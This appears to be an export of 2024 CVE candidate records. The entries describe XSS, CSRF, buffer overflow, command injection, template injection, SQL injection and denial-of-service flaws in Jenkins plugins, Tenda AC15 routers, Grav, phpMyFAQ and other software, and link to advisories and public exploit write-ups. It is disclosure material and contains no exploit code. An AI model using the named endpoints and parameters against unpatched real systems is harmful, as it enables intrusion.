CVE    2024    28160    Candidate    Jenkins iceScrum Plugin 1.1.6 and earlier does not sanitize iceScrum project URLs on build views, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure jobs.    MISC:Jenkins Security Advisory 2024-03-06   |   URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3248    Assigned (20240305)
CVE    2024    2816    Candidate    A vulnerability classified as problematic was found in Tenda AC15 15.03.05.18. Affected by this vulnerability is the function fromSysToolReboot of the file /goform/SysToolReboot. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257671. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257671 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257671   |   MISC:VDB-257671 | Tenda AC15 SysToolReboot fromSysToolReboot cross-site request forgery   |   URL:https://vuldb.com/?id.257671   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V15.03.05.18/fromSysToolReboot.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V15.03.05.18/fromSysToolReboot.md    Assigned (20240321)
CVE    2024    28159    Candidate    A missing permission check in Jenkins Subversion Partial Release Manager Plugin 1.0.1 and earlier allows attackers with Item/Read permission to trigger a build.    MISC:Jenkins Security Advisory 2024-03-06   |   URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3325    Assigned (20240305)
CVE    2024    28158    Candidate    A cross-site request forgery (CSRF) vulnerability in Jenkins Subversion Partial Release Manager Plugin 1.0.1 and earlier allows attackers to trigger a build.    MISC:Jenkins Security Advisory 2024-03-06   |   URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3325    Assigned (20240305)
CVE    2024    28157    Candidate    Jenkins GitBucket Plugin 0.8 and earlier does not sanitize Gitbucket URLs on build views, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure jobs.    MISC:Jenkins Security Advisory 2024-03-06   |   URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3249    Assigned (20240305)
CVE    2024    28156    Candidate    Jenkins Build Monitor View Plugin 1.14-860.vd06ef2568b_3f and earlier does not escape Build Monitor View names, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure Build Monitor Views.    MISC:Jenkins Security Advisory 2024-03-06   |   URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3280    Assigned (20240305)
CVE    2024    28155    Candidate    Jenkins AppSpider Plugin 1.0.16 and earlier does not perform permission checks in several HTTP endpoints, allowing attackers with Overall/Read permission to obtain information about available scan config names, engine group names, and client names.    MISC:Jenkins Security Advisory 2024-03-06   |   URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3144    Assigned (20240305)
CVE    2024    28154    Candidate    Jenkins MQ Notifier Plugin 1.4.0 and earlier logs potentially sensitive build parameters as part of debug information in build logs by default.    MISC:Jenkins Security Advisory 2024-03-06   |   URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3180    Assigned (20240305)
CVE    2024    28153    Candidate    Jenkins OWASP Dependency-Check Plugin 5.4.5 and earlier does not escape vulnerability metadata from Dependency-Check reports, resulting in a stored cross-site scripting (XSS) vulnerability.    MISC:Jenkins Security Advisory 2024-03-06   |   URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3344    Assigned (20240305)
CVE    2024    28152    Candidate    In Jenkins Bitbucket Branch Source Plugin 866.vdea_7dcd3008e and earlier, except 848.850.v6a_a_2a_234a_c81, when discovering pull requests from forks, the trust policy "Forks in the same account" allows changes to Jenkinsfiles from users without write access to the project when using Bitbucket Server.    MISC:Jenkins Security Advisory 2024-03-06   |   URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3300    Assigned (20240305)
CVE    2024    28151    Candidate    Jenkins HTML Publisher Plugin 1.32 and earlier archives invalid symbolic links in report directories on agents and recreates them on the controller, allowing attackers with Item/Configure permission to determine whether a path on the Jenkins controller file system exists, without being able to access it.    MISC:Jenkins Security Advisory 2024-03-06   |   URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3303    Assigned (20240305)
CVE    2024    28150    Candidate    Jenkins HTML Publisher Plugin 1.32 and earlier does not escape job names, report names, and index page titles shown as part of the report frame, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.    MISC:Jenkins Security Advisory 2024-03-06   |   URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3302    Assigned (20240305)
CVE    2024    2815    Candidate    A vulnerability classified as critical has been found in Tenda AC15 15.03.20_multi. Affected is the function R7WebsSecurityHandler of the file /goform/execCommand of the component Cookie Handler. The manipulation of the argument password leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257670 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257670 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257670   |   MISC:VDB-257670 | Tenda AC15 Cookie execCommand R7WebsSecurityHandler stack-based overflow   |   URL:https://vuldb.com/?id.257670   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V15.03.05.18/R7WebsSecurityHandler.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V15.03.05.18/R7WebsSecurityHandler.md    Assigned (20240321)
CVE    2024    28149    Candidate    Jenkins HTML Publisher Plugin 1.16 through 1.32 (both inclusive) does not properly sanitize input, allowing attackers with Item/Configure permission to implement cross-site scripting (XSS) attacks and to determine whether a path on the Jenkins controller file system exists.    MISC:Jenkins Security Advisory 2024-03-06   |   URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3301    Assigned (20240305)
CVE    2024    2814    Candidate    A vulnerability was found in Tenda AC15 15.03.20_multi. It has been rated as critical. This issue affects the function fromDhcpListClient of the file /goform/DhcpListClient. The manipulation of the argument page leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257669 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257669 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257669   |   MISC:VDB-257669 | Tenda AC15 DhcpListClient fromDhcpListClient stack-based overflow   |   URL:https://vuldb.com/?id.257669   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/fromDhcpListClient_page.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/fromDhcpListClient_page.md    Assigned (20240321)
CVE    2024    28131    Candidate    EasyRange Ver 1.41 contains an issue with the executable file search path when displaying an extracted file on Explorer, which may lead to loading an executable file that resides in the same folder where the extracted file is placed. If this vulnerability is exploited, arbitrary code may be executed with the privilege of the running program. Note that the developer was unreachable; therefore, users should consider stopping use of EasyRange Ver 1.41.    MISC:https://jvn.jp/en/jp/JVN13113728/index.html   |   URL:https://jvn.jp/en/jp/JVN13113728/index.html    Assigned (20240305)
CVE    2024    2813    Candidate    A vulnerability was found in Tenda AC15 15.03.20_multi. It has been declared as critical. This vulnerability affects the function form_fast_setting_wifi_set of the file /goform/fast_setting_wifi_set. The manipulation of the argument ssid leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257668. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257668 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257668   |   MISC:VDB-257668 | Tenda AC15 fast_setting_wifi_set form_fast_setting_wifi_set stack-based overflow   |   URL:https://vuldb.com/?id.257668   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/form_fast_setting_wifi_set.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/form_fast_setting_wifi_set.md    Assigned (20240321)
CVE    2024    28128    Candidate    Cross-site scripting vulnerability exists in FitNesse releases prior to 20220319, which may allow a remote unauthenticated attacker to execute an arbitrary script on the web browser of the user who is using the product and accessing a link with a specially crafted certain parameter.    MISC:http://fitnesse.org/FitNesseDownload   |   URL:http://fitnesse.org/FitNesseDownload   |   MISC:https://github.com/unclebob/fitnesse   |   URL:https://github.com/unclebob/fitnesse   |   MISC:https://github.com/unclebob/fitnesse/blob/master/SECURITY.md   |   URL:https://github.com/unclebob/fitnesse/blob/master/SECURITY.md   |   MISC:https://jvn.jp/en/jp/JVN94521208/   |   URL:https://jvn.jp/en/jp/JVN94521208/    Assigned (20240306)
CVE    2024    28126    Candidate    Cross-site scripting vulnerability exists in 0ch BBS Script ver.4.00. An arbitrary script may be executed on the web browser of the user accessing the website that uses the product. Note that the developer was unreachable; therefore, users should consider stopping use of 0ch BBS Script ver.4.00.    MISC:https://jvn.jp/en/jp/JVN46874970/   |   URL:https://jvn.jp/en/jp/JVN46874970/    Assigned (20240305)
CVE    2024    28125    Candidate    FitNesse all releases allows a remote authenticated attacker to execute arbitrary OS commands.    MISC:http://fitnesse.org/FitNesseDownload   |   URL:http://fitnesse.org/FitNesseDownload   |   MISC:https://github.com/unclebob/fitnesse   |   URL:https://github.com/unclebob/fitnesse   |   MISC:https://github.com/unclebob/fitnesse/blob/master/SECURITY.md   |   URL:https://github.com/unclebob/fitnesse/blob/master/SECURITY.md   |   MISC:https://jvn.jp/en/jp/JVN94521208/   |   URL:https://jvn.jp/en/jp/JVN94521208/    Assigned (20240306)
CVE    2024    28123    Candidate    Wasmi is an efficient and lightweight WebAssembly interpreter with a focus on constrained and embedded systems. In the WASMI Interpreter, an Out-of-bounds Buffer Write will arise if the host calls or resumes a Wasm function with more parameters than the default limit (128), as it will surpass the stack value. This doesn’t affect calls from Wasm to Wasm, only from host to Wasm. This vulnerability was patched in version 0.31.1.    MISC:https://github.com/wasmi-labs/wasmi/commit/f7b3200e9f3dc9e2cbca966cb255c228453c792f   |   URL:https://github.com/wasmi-labs/wasmi/commit/f7b3200e9f3dc9e2cbca966cb255c228453c792f   |   MISC:https://github.com/wasmi-labs/wasmi/releases/tag/v0.31.1   |   URL:https://github.com/wasmi-labs/wasmi/releases/tag/v0.31.1   |   MISC:https://github.com/wasmi-labs/wasmi/security/advisories/GHSA-75jp-vq8x-h4cq   |   URL:https://github.com/wasmi-labs/wasmi/security/advisories/GHSA-75jp-vq8x-h4cq    Assigned (20240304)
CVE    2024    28122    Candidate    JWX is a Go module implementing various JWx (JWA/JWE/JWK/JWS/JWT, otherwise known as JOSE) technologies. This vulnerability allows an attacker with a trusted public key to cause a Denial-of-Service (DoS) condition by crafting a malicious JSON Web Encryption (JWE) token with an exceptionally high compression ratio. This issue has been patched in versions 1.2.29 and 2.0.21.    MISC:https://github.com/lestrrat-go/jwx/releases/tag/v1.2.29   |   URL:https://github.com/lestrrat-go/jwx/releases/tag/v1.2.29   |   MISC:https://github.com/lestrrat-go/jwx/releases/tag/v2.0.21   |   URL:https://github.com/lestrrat-go/jwx/releases/tag/v2.0.21   |   MISC:https://github.com/lestrrat-go/jwx/security/advisories/GHSA-hj3v-m684-v259   |   URL:https://github.com/lestrrat-go/jwx/security/advisories/GHSA-hj3v-m684-v259    Assigned (20240304)
CVE    2024    28121    Candidate    stimulus_reflex is a system to extend the capabilities of both Rails and Stimulus by intercepting user interactions and passing them to Rails over real-time websockets. In affected versions more methods than expected can be called on reflex instances. Being able to call some of them has security implications. To invoke a reflex a websocket message of the following shape is sent: `\"target\":\"[class_name]#[method_name]\",\"args\":[]`. The server will proceed to instantiate `reflex` using the provided `class_name` as long as it extends `StimulusReflex::Reflex`. It then attempts to call `method_name` on the instance with the provided arguments. This is problematic as `reflex.method method_name` can be more methods than those explicitly specified by the developer in their reflex class. A good example is the instance_variable_set method. This vulnerability has been patched in versions 3.4.2 and 3.5.0.rc4. Users unable to upgrade should see the backing GHSA advisory for mitigation advice.    FULLDISC:20240313 StimulusReflex CVE-2024-28121   |   URL:http://seclists.org/fulldisclosure/2024/Mar/16   |   MISC:https://github.com/stimulusreflex/stimulus_reflex/blob/0211cad7d60fe96838587f159d657e44cee51b9b/app/channels/stimulus_reflex/channel.rb#L83   |   URL:https://github.com/stimulusreflex/stimulus_reflex/blob/0211cad7d60fe96838587f159d657e44cee51b9b/app/channels/stimulus_reflex/channel.rb#L83   |   MISC:https://github.com/stimulusreflex/stimulus_reflex/commit/538582d240439aab76066c72335ea92096cd0c7f   |   URL:https://github.com/stimulusreflex/stimulus_reflex/commit/538582d240439aab76066c72335ea92096cd0c7f   |   MISC:https://github.com/stimulusreflex/stimulus_reflex/releases/tag/v3.4.2   |   URL:https://github.com/stimulusreflex/stimulus_reflex/releases/tag/v3.4.2   |   MISC:https://github.com/stimulusreflex/stimulus_reflex/releases/tag/v3.5.0.rc4   |   URL:https://github.com/stimulusreflex/stimulus_reflex/releases/tag/v3.5.0.rc4   |   MISC:https://github.com/stimulusreflex/stimulus_reflex/security/advisories/GHSA-f78j-4w3g-4q65   |   URL:https://github.com/stimulusreflex/stimulus_reflex/security/advisories/GHSA-f78j-4w3g-4q65    Assigned (20240304)
CVE    2024    28120    Candidate    codeium-chrome is an open source code completion plugin for the chrome web browser. The service worker of the codeium-chrome extension doesn't check the sender when receiving an external message. This allows an attacker to host a website that will steal the user's Codeium api-key, and thus impersonate the user on the backend autocomplete server. This issue has not been addressed. Users are advised to monitor the usage of their API key.    MISC:https://github.com/Exafunction/codeium-chrome/security/advisories/GHSA-8c7j-2h97-q63p   |   URL:https://github.com/Exafunction/codeium-chrome/security/advisories/GHSA-8c7j-2h97-q63p   |   MISC:https://securitylab.github.com/advisories/GHSL-2024-027_GHSL-2024-028_codeium-chrome   |   URL:https://securitylab.github.com/advisories/GHSL-2024-027_GHSL-2024-028_codeium-chrome    Assigned (20240304)
CVE    2024    2812    Candidate    A vulnerability was found in Tenda AC15 15.03.05.18/15.03.20_multi. It has been classified as critical. This affects the function formWriteFacMac of the file /goform/WriteFacMac. The manipulation of the argument mac leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257667. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257667 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257667   |   MISC:VDB-257667 | Tenda AC15 WriteFacMac formWriteFacMac os command injection   |   URL:https://vuldb.com/?id.257667   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/formWriteFacMac.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/formWriteFacMac.md    Assigned (20240321)
CVE    2024    28119    Candidate    Grav is an open-source, flat-file content management system. Prior to version 1.7.45, due to the unrestricted access to twig extension class from grav context, an attacker can redefine the escape function and execute arbitrary commands. Twig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit pages. As the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance. Version 1.7.45 contains a patch for this issue.    MISC:https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe   |   URL:https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe   |   MISC:https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58   |   URL:https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58   |   MISC:https://github.com/twigphp/Twig/blob/3.x/src/Extension/EscaperExtension.php#L99   |   URL:https://github.com/twigphp/Twig/blob/3.x/src/Extension/EscaperExtension.php#L99    Assigned (20240304)
CVE    2024    28118    Candidate    Grav is an open-source, flat-file content management system. Prior to version 1.7.45, due to the unrestricted access to the Twig extension class from the Grav context, an attacker can redefine a config variable. As a result, the attacker can bypass a previous SSTI mitigation. Twig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit pages. As the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance. Version 1.7.45 contains a fix for this issue.    MISC:https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe   |   URL:https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe   |   MISC:https://github.com/getgrav/grav/security/advisories/GHSA-r6vw-8v8r-pmp4   |   URL:https://github.com/getgrav/grav/security/advisories/GHSA-r6vw-8v8r-pmp4    Assigned (20240304)
CVE    2024    28117    Candidate    Grav is an open-source, flat-file content management system. Prior to version 1.7.45, Grav validates accessible functions through the Utils::isDangerousFunction function, but does not impose restrictions on twig functions like twig_array_map, allowing attackers to bypass the validation and execute arbitrary commands. Twig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit pages. As the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance. Upgrading to patched version 1.7.45 can mitigate this issue.    MISC:https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe   |   URL:https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe   |   MISC:https://github.com/getgrav/grav/security/advisories/GHSA-qfv4-q44r-g7rv   |   URL:https://github.com/getgrav/grav/security/advisories/GHSA-qfv4-q44r-g7rv    Assigned (20240304)
CVE    2024    28116    Candidate    Grav is an open-source, flat-file content management system. Grav CMS prior to version 1.7.45 is vulnerable to a Server-Side Template Injection (SSTI), which allows any authenticated user (editor permissions are sufficient) to execute arbitrary code on the remote server bypassing the existing security sandbox. Version 1.7.45 contains a patch for this issue.    MISC:https://github.com/getgrav/grav/commit/4149c81339274130742831422de2685f298f3a6e   |   URL:https://github.com/getgrav/grav/commit/4149c81339274130742831422de2685f298f3a6e   |   MISC:https://github.com/getgrav/grav/security/advisories/GHSA-c9gp-64c4-2rrh   |   URL:https://github.com/getgrav/grav/security/advisories/GHSA-c9gp-64c4-2rrh    Assigned (20240304)
CVE    2024    28115    Candidate    FreeRTOS is a real-time operating system for microcontrollers. FreeRTOS Kernel versions through 10.6.1 do not sufficiently protect against local privilege escalation via Return Oriented Programming techniques should a vulnerability exist that allows code injection and execution. These issues affect ARMv7-M MPU ports, and ARMv8-M ports with Memory Protected Unit (MPU) support enabled (i.e. `configENABLE_MPU` set to 1). These issues are fixed in version 10.6.2 with a new MPU wrapper.    MISC:https://github.com/FreeRTOS/FreeRTOS-Kernel/releases/tag/V10.6.2   |   URL:https://github.com/FreeRTOS/FreeRTOS-Kernel/releases/tag/V10.6.2   |   MISC:https://github.com/FreeRTOS/FreeRTOS-Kernel/security/advisories/GHSA-xcv7-v92w-gq6r   |   URL:https://github.com/FreeRTOS/FreeRTOS-Kernel/security/advisories/GHSA-xcv7-v92w-gq6r    Assigned (20240304)
CVE    2024    28114    Candidate    Peering Manager is a BGP session management tool. There is a Server Side Template Injection vulnerability that leads to Remote Code Execution in Peering Manager <=1.8.2. As a result arbitrary commands can be executed on the operating system that is running Peering Manager. This issue has been addressed in version 1.8.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/peering-manager/peering-manager/commit/8a865fb596c11ad7caf45aef317d8fcbce7f85ff   |   URL:https://github.com/peering-manager/peering-manager/commit/8a865fb596c11ad7caf45aef317d8fcbce7f85ff   |   MISC:https://github.com/peering-manager/peering-manager/security/advisories/GHSA-q37x-qfrx-jcv6   |   URL:https://github.com/peering-manager/peering-manager/security/advisories/GHSA-q37x-qfrx-jcv6   |   MISC:https://owasp.org/www-community/attacks/Command_Injection   |   URL:https://owasp.org/www-community/attacks/Command_Injection   |   MISC:https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server_Side_Template_Injection   |   URL:https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server_Side_Template_Injection   |   MISC:https://stackoverflow.com/questions/73939573/how-to-sanitise-string-of-python-code-with-python   |   URL:https://stackoverflow.com/questions/73939573/how-to-sanitise-string-of-python-code-with-python    Assigned (20240304)
CVE    2024    28113    Candidate    Peering Manager is a BGP session management tool. In Peering Manager <=1.8.2, it is possible to redirect users to an arbitrary page using a crafted url. As a result users can be redirected to an unexpected location. This issue has been addressed in version 1.8.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/peering-manager/peering-manager/commit/49dc5593184d7740d81e57dbbe3f971d2969dfac   |   URL:https://github.com/peering-manager/peering-manager/commit/49dc5593184d7740d81e57dbbe3f971d2969dfac   |   MISC:https://github.com/peering-manager/peering-manager/security/advisories/GHSA-f4mf-5g28-q7f5   |   URL:https://github.com/peering-manager/peering-manager/security/advisories/GHSA-f4mf-5g28-q7f5    Assigned (20240304)
CVE    2024    28112    Candidate    Peering Manager is a BGP session management tool. Affected versions of Peering Manager are subject to a potential stored Cross-Site Scripting (XSS) attack in the `name` attribute of AS or Platform. The XSS triggers on a router's detail page. Adversaries are able to execute arbitrary JavaScript code with the permission of a victim. XSS attacks are often used to steal credentials or login tokens of other users. This issue has been addressed in version 1.8.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/peering-manager/peering-manager/security/advisories/GHSA-fmf5-24pq-rq2w   |   URL:https://github.com/peering-manager/peering-manager/security/advisories/GHSA-fmf5-24pq-rq2w   |   MISC:https://owasp.org/www-community/attacks/xss   |   URL:https://owasp.org/www-community/attacks/xss    Assigned (20240304)
CVE    2024    28111    Candidate    Canarytokens helps track activity and actions on a network. Canarytokens.org supports exporting the history of a Canarytoken's incidents in CSV format. The generation of these CSV files is vulnerable to a CSV Injection vulnerability. This flaw can be used by an attacker who discovers an HTTP-based Canarytoken to target the Canarytoken's owner, if the owner exports the incident history to CSV and opens in a reader application such as Microsoft Excel. The impact is that this issue could lead to code execution on the machine on which the CSV file is opened. Version sha-c595a1f8 contains a fix for this issue.    MISC:https://github.com/thinkst/canarytokens/commit/c595a1f884b986da2ca05aa5bff9ae5f93c6a4aa   |   URL:https://github.com/thinkst/canarytokens/commit/c595a1f884b986da2ca05aa5bff9ae5f93c6a4aa   |   MISC:https://github.com/thinkst/canarytokens/security/advisories/GHSA-fqh6-v4qp-65fv   |   URL:https://github.com/thinkst/canarytokens/security/advisories/GHSA-fqh6-v4qp-65fv    Assigned (20240304)
CVE    2024    28110    Candidate    Go SDK for CloudEvents is the official CloudEvents SDK to integrate applications with CloudEvents. Prior to version 2.15.2, using cloudevents.WithRoundTripper to create a cloudevents.Client with an authenticated http.RoundTripper causes the go-sdk to leak credentials to arbitrary endpoints. When the transport is populated with an authenticated transport, then http.DefaultClient is modified with the authenticated transport and will start to send Authorization tokens to any endpoint it is used to contact. Version 2.15.2 patches this issue.    MISC:https://github.com/cloudevents/sdk-go/blob/67e389964131d55d65cd14b4eb32d57a47312695/v2/protocol/http/protocol.go#L104-L110   |   URL:https://github.com/cloudevents/sdk-go/blob/67e389964131d55d65cd14b4eb32d57a47312695/v2/protocol/http/protocol.go#L104-L110   |   MISC:https://github.com/cloudevents/sdk-go/commit/de2f28370b0d2a0f64f92c0c6139fa4b8a7c3851   |   URL:https://github.com/cloudevents/sdk-go/commit/de2f28370b0d2a0f64f92c0c6139fa4b8a7c3851   |   MISC:https://github.com/cloudevents/sdk-go/security/advisories/GHSA-5pf6-2qwx-pxm2   |   URL:https://github.com/cloudevents/sdk-go/security/advisories/GHSA-5pf6-2qwx-pxm2    Assigned (20240304)
CVE    2024    2811    Candidate    A vulnerability was found in Tenda AC15 15.03.20_multi and classified as critical. Affected by this issue is the function formWifiWpsStart of the file /goform/WifiWpsStart. The manipulation of the argument index leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257666 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257666 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257666   |   MISC:VDB-257666 | Tenda AC15 WifiWpsStart formWifiWpsStart stack-based overflow   |   URL:https://vuldb.com/?id.257666   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/formWifiWpsStart.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/formWifiWpsStart.md    Assigned (20240321)
CVE    2024    28108    Candidate    phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. Due to insufficient validation on the `contentLink` parameter, it is possible for unauthenticated users to inject HTML code to the page which might affect other users. _Also, requires that adding new FAQs is allowed for guests and that the admin doesn't check the content of a newly added FAQ._ This vulnerability is fixed in 3.2.6.    MISC:https://github.com/thorsten/phpMyFAQ/commit/4fed1d9602f0635260f789fe85995789d94d6634   |   URL:https://github.com/thorsten/phpMyFAQ/commit/4fed1d9602f0635260f789fe85995789d94d6634   |   MISC:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-48vw-jpf8-hwqh   |   URL:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-48vw-jpf8-hwqh    Assigned (20240304)
CVE    2024    28107    Candidate    phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. A SQL injection vulnerability has been discovered in the `insertentry` & `saveentry` when modifying records due to improper escaping of the email address. This allows any authenticated user with the rights to add/edit FAQ news to exploit this vulnerability to exfiltrate data, take over accounts and in some cases, even achieve RCE. This vulnerability is fixed in 3.2.6.    MISC:https://github.com/thorsten/phpMyFAQ/commit/d0fae62a72615d809e6710861c1a7f67ac893007   |   URL:https://github.com/thorsten/phpMyFAQ/commit/d0fae62a72615d809e6710861c1a7f67ac893007   |   MISC:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-2grw-mc9r-822r   |   URL:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-2grw-mc9r-822r    Assigned (20240304)
CVE    2024    28106    Candidate    phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. By manipulating the news parameter in a POST request, an attacker can inject malicious JavaScript code. Upon browsing to the compromised news page, the XSS payload triggers. This vulnerability is fixed in 3.2.6.    MISC:https://github.com/thorsten/phpMyFAQ/commit/c94b3deadd87789389e1fad162bc3dd595c0e15a   |   URL:https://github.com/thorsten/phpMyFAQ/commit/c94b3deadd87789389e1fad162bc3dd595c0e15a   |   MISC:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-6p68-36m6-392r   |   URL:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-6p68-36m6-392r    Assigned (20240304)
CVE    2024    28105    Candidate    phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. The category image upload function in phpmyfaq is vulnerable to manipulation of the `Content-type` and `lang` parameters, allowing attackers to upload malicious files with a .php extension, potentially leading to remote code execution (RCE) on the system. This vulnerability is fixed in 3.2.6.    MISC:https://github.com/thorsten/phpMyFAQ/commit/9136883776af67dfdb0e8cf14f5e0ca22bf4f2e7   |   URL:https://github.com/thorsten/phpMyFAQ/commit/9136883776af67dfdb0e8cf14f5e0ca22bf4f2e7   |   MISC:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-pwh2-fpfr-x5gf   |   URL:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-pwh2-fpfr-x5gf    Assigned (20240304)
CVE    2024    28102    Candidate    JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length.    MISC:https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f   |   URL:https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f   |   MISC:https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97   |   URL:https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97    Assigned (20240304)
CVE    2024    28101    Candidate    The Apollo Router is a graph router written in Rust to run a federated supergraph that uses Apollo Federation. Versions 0.9.5 until 1.40.2 are subject to a Denial-of-Service (DoS) type vulnerability. When receiving compressed HTTP payloads, affected versions of the Router evaluate the `limits.http_max_request_bytes` configuration option after the entirety of the compressed payload is decompressed. If affected versions of the Router receive highly compressed payloads, this could result in significant memory consumption while the compressed payload is expanded. Router version 1.40.2 has a fix for the vulnerability. Those who are unable to upgrade may be able to implement mitigations at proxies or load balancers positioned in front of their Router fleet (e.g. Nginx, HAProxy, or cloud-native WAF services) by creating limits on HTTP body upload size.    MISC:https://github.com/apollographql/router/commit/9e9527c73c8f34fc8438b09066163cd42520f413   |   URL:https://github.com/apollographql/router/commit/9e9527c73c8f34fc8438b09066163cd42520f413   |   MISC:https://github.com/apollographql/router/security/advisories/GHSA-cgqf-3cq5-wvcj   |   URL:https://github.com/apollographql/router/security/advisories/GHSA-cgqf-3cq5-wvcj    Assigned (20240304)
